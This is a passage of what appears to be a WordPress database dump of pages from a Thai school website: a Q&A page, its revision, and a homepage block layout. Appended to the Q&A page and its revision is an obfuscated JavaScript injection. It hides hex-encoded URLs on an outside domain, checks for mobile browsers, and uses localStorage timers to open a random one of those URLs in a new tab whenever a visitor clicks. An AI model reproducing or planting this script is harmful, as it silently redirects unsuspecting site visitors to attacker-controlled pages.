_0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ถาม-ตอบ (Q&amp;A)','','publish','closed','closed','','%e0%b8%96%e0%b8%b2%e0%b8%a1-%e0%b8%95%e0%b8%ad%e0%b8%9a-qa','','','2024-08-06 20:56:17','2024-08-06 13:56:17','',0,'http://pakhaeng.ssk.in.th/?page_id=506',0,'page','',0),
(507,1,'2024-08-03 21:25:27','2024-08-03 14:25:27','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"c65da3cd\",\"blockVersion\":3,\"typography\":{\"textAlign\":\"center\"},\"borders\":{\"borderBottomColor\":\"#cf2e2e\"},\"backgroundColor\":\"#7bdcb5\",\"textColor\":\"#000000\",\"linkColor\":\"#ff6900\",\"linkColorHover\":\"#9b51e0\",\"highlightTextColor\":\"#ff6900\",\"iconColor\":\"#f78da7\"} -->\n<h2 class=\"gb-headline gb-headline-c65da3cd gb-headline-text\">เพิ่ม กระทู้คำถาม</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:shortcode -->\n[qa_add_question]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"26f662fa\",\"blockVersion\":3,\"typography\":{\"textAlign\":\"center\"},\"backgroundColor\":\"#7bdcb5\",\"linkColor\":\"#9b51e0\",\"linkColorHover\":\"#ff6900\"} -->\n<h2 class=\"gb-headline gb-headline-26f662fa gb-headline-text\">กระทู้ถาม-ตอบทั้งหมด</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[question_archive]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ถาม-ตอบ (Q&amp;A)','','inherit','closed','closed','','506-revision-v1','','','2024-08-03 21:25:27','2024-08-03 14:25:27','',506,'http://pakhaeng.ssk.in.th/?p=507',0,'revision','',0),
(508,1,'2024-08-03 21:26:01','2024-08-03 14:26:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span 